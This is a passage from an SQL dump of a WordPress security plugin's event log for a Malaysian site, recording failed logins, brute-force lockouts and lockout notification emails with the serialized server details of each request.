empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYotnkXpgmG5P@iB8k0@QAAAI0\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.70.191\";s:11:\"REMOTE_PORT\";s:5:\"55054\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYotnkXpgmG5P@iB8k0@QAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073334.5993\";s:12:\"REQUEST_TIME\";s:10:\"1569073334\";}}','notice','2019-09-21 13:42:15','2019-09-21 13:42:14',17847736,19339640,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.70.191'),(26030,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:41:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:41:48\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:56:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:56:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:41:49','2019-09-21 13:41:48',17934256,19340840,'https://bintara.com.my/test/wp-login.php',1,0,'149.56.38.19'),(26009,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:37:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:37:52\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:52:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:52:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:37:53','2019-09-21 13:37:52',17900032,19305656,'https://bintara.com.my/blog/wp-login.php',1,0,'35.200.239.78'),(26010,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:37:53','2019-09-21 13:37:52',18106104,19305656,'https://bintara.com.my/blog/wp-login.php',1,0,'35.200.239.78'),(26011,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYn6nkXpgmG5P@iB8k0QgAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"223.27.16.120\";s:11:\"REMOTE_PORT\";s:5:\"53048\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYn6nkXpgmG5P@iB8k0QgAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073130.1278\";s:12:\"REQUEST_TIME\";s:10:\"1569073130\";}}','notice','2019-09-21 13:38:51','2019-09-21 13:38:50',17816392,19306592,'https://bintara.com.my/wp/wp-login.php',1,0,'223.27.16.120'),(26008,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnr1iJ7D9Gn7wDPh8iJAAAANM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"35.200.239.78\";s:11:\"REMOTE_PORT\";s:5:\"42046\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnr1iJ7D9Gn7wDPh8iJAAAANM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073071.8459\";s:12:\"REQUEST_TIME\";s:10:\"1569073071\";}}','notice','2019-09-21 13:37:53','2019-09-21 13:37:52',17815104,19305656,'https://bintara.com.my/blog/wp-login.php',1,0,'35.200.239.78'),(26006,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:37:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:37:24\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:52:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:52:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:37:25','2019-09-21 13:37:24',17900032,19305656,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.77.168'),(26007,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:37:25','2019-09-21 13:37:24',18106104,19305656,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.77.168'),(26004,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:37:21','2019-09-21 13:37:20',18106104,19305656,'https://bintara.com.my/2019/wp-login.php',1,0,'138.68.24.138'),(26005,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnlHkXpgmG5P@iB8kz-QAAAI0\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.77.168\";s:11:\"REMOTE_PORT\";s:5:\"33170\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnlHkXpgmG5P@iB8kz-QAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073044.1298\";s:12:\"REQUEST_TIME\";s:10:\"1569073044\";}}','notice','2019-09-21 13:37:25','2019-09-21 13:37:24',17815104,19305656,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.77.168'),(26003,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:37:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:37:20\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:52:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:52:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:37:21','2019-09-21 13:37:20',17900032,19305656,'https://bintara.com.my/2019/wp-login.php',1,0,'138.68.24.138'),(26000,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:36:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:36:57\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:51:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:51:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:36:58','2019-09-21 13:36:57',17900272,19306104,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.32.116.253'),(26001,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:36:58','2019-09-21 13:36:57',18105912,19306104,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.32.116.253'),(26002,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnj3kXpgmG5P@iB8kz9QAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"138.68.24.138\";s:11:\"REMOTE_PORT\";s:5:\"24458\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnj3kXpgmG5P@iB8kz9QAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073039.9052\";s:12:\"REQUEST_TIME\";s:10:\"1569073039\";}}','notice','2019-09-21 13:37:21','2019-09-21 13:37:20',17815104,19305656,'https://bintara.com.my/2019/wp-login.php',1,0,'138.68.24.138'),(25999,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYneFiJ7D9Gn7wDPh8iBgAAAMk\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.32.116.253\";s:11:\"REMOTE_PORT\";s:5:\"48682\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYneFiJ7D9Gn7wDPh8iBgAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073016.8859\";s:12:\"REQUEST_TIME\";s:10:\"1569073016\";}}','notice','2019-09-21 13:36:58','2019-09-21 13:36:57',17815288,19306104,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.32.116.253'),(25997,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:36:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:36:35\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:51:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:51:35\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 